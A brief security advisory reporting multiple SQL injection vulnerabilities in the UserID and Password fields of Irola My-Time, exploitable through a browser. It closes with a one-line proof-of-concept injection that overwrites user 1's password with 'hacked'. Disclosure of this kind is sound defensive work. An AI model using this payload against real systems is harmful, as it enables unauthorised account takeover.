Irola My-Time UserID and Password Multiple SQL Injection Vulnerabilities

Irola My-Time UserID and Password Multiple SQL Injection Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept SQL code is available:

-1' UPDATE UserInfo set Password= 'hacked' Where(UserID= '1');--